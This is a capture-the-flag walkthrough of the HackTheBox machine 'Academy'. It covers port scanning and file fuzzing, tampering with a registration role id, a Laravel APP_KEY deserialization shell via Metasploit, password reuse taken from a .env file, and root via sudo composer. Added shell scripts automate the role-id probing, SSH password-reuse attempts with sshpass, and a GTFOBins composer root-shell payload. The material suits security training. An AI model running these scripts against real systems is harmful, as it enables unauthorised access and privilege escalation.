Academy

Port Scanning and general enumeration (Nmap, FFuF)

img

A web server, plus something MySQL-related listening on a high port. Let's start with the web server.

Browsing to the target IP gives an error that points at academy.htb. Adding the IP and academy.htb to /etc/hosts fixes it.

img

We have the ability to LOGIN and REGISTER. After registering and logging in we're greeted with a home.php page that looks like HTB Academy, but nothing on it works. We know the site is built on PHP, so let's point FFuF at it and fuzz for .php files.

img

An admin page?

img

It requires credentials we don't have.

Access (BurpSuite, metasploit)

Let's go back and take a closer look at the registration process by capturing the request in Burp Suite.

img

Interesting parameter: roleid. The server is letting the client say which role the new account gets, so let's change it to 1 and send the request. What happens if we use this new account, registered with roleid 1, to log into the admin section?
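The Burp edit above, scripted so it can be repeated for other role ids. This is an added example, not code from the original writeup: the registration and admin-login paths, the field names other than roleid (uid, password, confirm) and the marker used to recognise a successful login are all assumptions, since the writeup only shows that the registration body carries a roleid field. It also goes a little beyond the text by probing several role values instead of just 1.

```shell
#!/bin/sh
# Added example, not from the original writeup: replay the Burp roleid edit
# from a script so it can be repeated for other role ids.  Endpoint paths,
# the field names other than roleid, and SUCCESS_MARKER are assumptions.
BASE=${BASE:-http://academy.htb}
REGISTER_URL="$BASE/register.php"        # assumed path
ADMIN_LOGIN_URL="$BASE/admin/index.php"  # assumed path
SUCCESS_MARKER=${SUCCESS_MARKER:-Logout}  # assumed: only present once logged in

# Rewrite the roleid field of a captured urlencoded body, or append one if the
# form never sent it.  This is the Burp edit as a function.
with_roleid() {  # with_roleid BODY ROLE
  case "$1" in
    *roleid=*) printf '%s\n' "$1" | sed "s/roleid=[^&]*/roleid=$2/" ;;
    *)         printf '%s&roleid=%s\n' "$1" "$2" ;;
  esac
}

# Register a throwaway account with the tampered body, then try the admin
# login with the same credentials.  Prints the role id if the admin page
# accepts the account.  Needs network access; not run by the checks below.
probe_role() {  # probe_role USER PASS ROLE
  jar=$(mktemp)
  body=$(with_roleid "uid=$1&password=$2&confirm=$2" "$3")
  curl -s -o /dev/null -c "$jar" -d "$body" "$REGISTER_URL"
  if curl -s -b "$jar" -c "$jar" -d "uid=$1&password=$2" "$ADMIN_LOGIN_URL" \
       | grep -q "$SUCCESS_MARKER"; then
    printf 'roleid=%s grants admin access\n' "$3"
  fi
  rm -f "$jar"
}

# Probe a small range of role ids, one fresh account each (usernames must be
# unique, hence the role id and PID in the name).
probe_roles() {
  for r in 0 1 2 3; do
    probe_role "probe$r$$" 'Pr0be-Pass!' "$r"
  done
}
```

Run `probe_roles` against the target once the hosts entry is in place; the only role that should ever be accepted by the admin login is the one the server hands out itself, so any other hit confirms the role is client-controlled.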

img

We're in! The admin section references dev-staging-01.academy.htb, so let's add that to /etc/hosts as well and navigate to it.

img

An error page, but a very talkative one. It dumps the application's environment: database usernames and passwords, the framework (Laravel) and even the APP_KEY. That key is what Laravel uses to encrypt and sign its cookies and session payloads, so anyone holding it can forge data the application will trust. I couldn't find a Laravel version number, but let's see if Metasploit has anything for us.

img

Looks good. Beyond the usual options it needs the APP_KEY (the base64 string from the error page) and VHOST, which in our case is dev-staging-01.academy.htb.

Let’s fire it off and get our shell.

Privesc (linPEAS, Composer)

Some manual enumeration on the box turns up a couple of things worth noting. First, six users have an interactive shell.

img

Second, the .env file for htb-academy-dev-01 holds much the same information as the error page we found earlier. But since that's only a staging copy of the site, what if the original academy site has a .env file too?

img

I wonder if any of those six users is the database developer? Maybe they reuse passwords?
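One way to turn the enumeration so far into a password-reuse check, as an added example that is not part of the original writeup. It pulls the interactive-shell accounts out of /etc/passwd and the DB_PASSWORD out of the site's .env, pairs them up, and optionally tries each pair over SSH with sshpass (that last step assumes SSH is reachable and sshpass is installed). The two sample files embedded below are constructed stand-ins with a dummy password, not the box's real data.

```shell
#!/bin/sh
# Added example, not from the original writeup: build the password-reuse
# candidate list from a Laravel .env and /etc/passwd.  The sample files below
# are constructed (dummy users, dummy password); on the box you would point
# the functions at /etc/passwd and the real .env instead.

SAMPLE_DIR=$(mktemp -d)

# Constructed /etc/passwd excerpt: a mix of real shells and non-login accounts.
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/zsh
deploy:x:1002:1002::/home/deploy:/bin/sh
mysql:x:110:115:MySQL Server:/nonexistent:/bin/false
EOF

# Constructed Laravel .env excerpt with a dummy password.
cat > "$SAMPLE_DIR/env" <<'EOF'
APP_NAME=Laravel
APP_ENV=local
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_USERNAME=dev
DB_PASSWORD="Dummy-Db-Pass-1"
EOF

# Accounts whose login shell (field 7) is an actual shell.  nologin, false and
# sync drop out because their path does not end in "sh".
interactive_users() {  # interactive_users PASSWD_FILE
  awk -F: '$7 ~ /sh$/ { print $1 }' "$1"
}

# Value of KEY from a dotenv file, with surrounding quotes stripped.
env_value() {  # env_value KEY ENV_FILE
  sed -n "s/^$1=//p" "$2" | tr -d "\"'"
}

# One "user:password" line per interactive account, ready to feed to su or ssh.
reuse_candidates() {  # reuse_candidates PASSWD_FILE ENV_FILE
  pw=$(env_value DB_PASSWORD "$2")
  interactive_users "$1" | while read -r u; do
    printf '%s:%s\n' "$u" "$pw"
  done
}

# Try each candidate over SSH.  Assumes sshpass is installed and the target
# accepts password auth; not exercised on the sample data.  Prints the first
# user that accepts the database password.
find_reuse_over_ssh() {  # find_reuse_over_ssh HOST PASSWD_FILE ENV_FILE
  reuse_candidates "$2" "$3" | while IFS=: read -r u pw; do
    if sshpass -p "$pw" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 \
         -o PreferredAuthentications=password "$u@$1" id >/dev/null 2>&1; then
      printf 'password reused by %s\n' "$u"
      break
    fi
  done
}

reuse_candidates "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/env"
```

Without SSH the candidate list is still the useful output: it is exactly the set of `su` attempts to make by hand from the www-data shell, and it stops you from trying the password against accounts that cannot log in anyway.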

Trying that password against each user in turn, it works for cry0l1t3.

img

So now we’re cry0l1t3, what can we do?

img

Turns out, not a lot. Let’s run linPEAS and see if there are any privesc vectors we can use

img

Oh? A lateral move? Well, mrb3n, what can you do?

img

This user can actually sudo, and the allowed command is composer. Checking GTFOBins we find

img
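The GTFOBins composer technique as a script, added here as an example and not taken from the writeup itself. It assumes mrb3n's sudo rule allows composer without restricting its arguments. composer executes the entries under "scripts" in composer.json with the privileges of whoever invoked it, so `sudo composer ... run-script x` runs the script as root.

```shell
#!/bin/sh
# Added example, not from the original writeup: the sudo composer abuse from
# GTFOBins, scripted.  Assumes the sudo rule allows composer with arbitrary
# arguments and that /bin/sh exists on the target.

# Write a composer.json whose only script is an interactive shell and print
# the directory it lives in.  The script's stdin/stdout/stderr are rebound to
# file descriptor 3, the GTFOBins trick that keeps the shell usable while
# composer captures the script's normal output.
make_composer_payload() {
  d=$(mktemp -d)
  cat > "$d/composer.json" <<'EOF'
{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}
EOF
  printf '%s\n' "$d"
}

# Check the rule before pulling the trigger: succeeds only if sudo -l lists
# composer without prompting (the exact line varies with sudoers syntax,
# hence the loose match).
sudo_allows_composer() {
  sudo -n -l 2>/dev/null | grep -q composer
}

# Escalate: run the payload script through sudo composer.  Not run by the
# checks below; on the target this drops you into a root shell.
composer_root_shell() {
  d=$(make_composer_payload)
  sudo composer --working-dir="$d" run-script x
}
```

Call `sudo_allows_composer && composer_root_shell` from mrb3n's shell. The fix on the defending side is the usual one for GTFOBins entries: never grant sudo on a tool that can execute arbitrary commands from a user-controlled config file.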

Follow the instructions and claim your prize!

img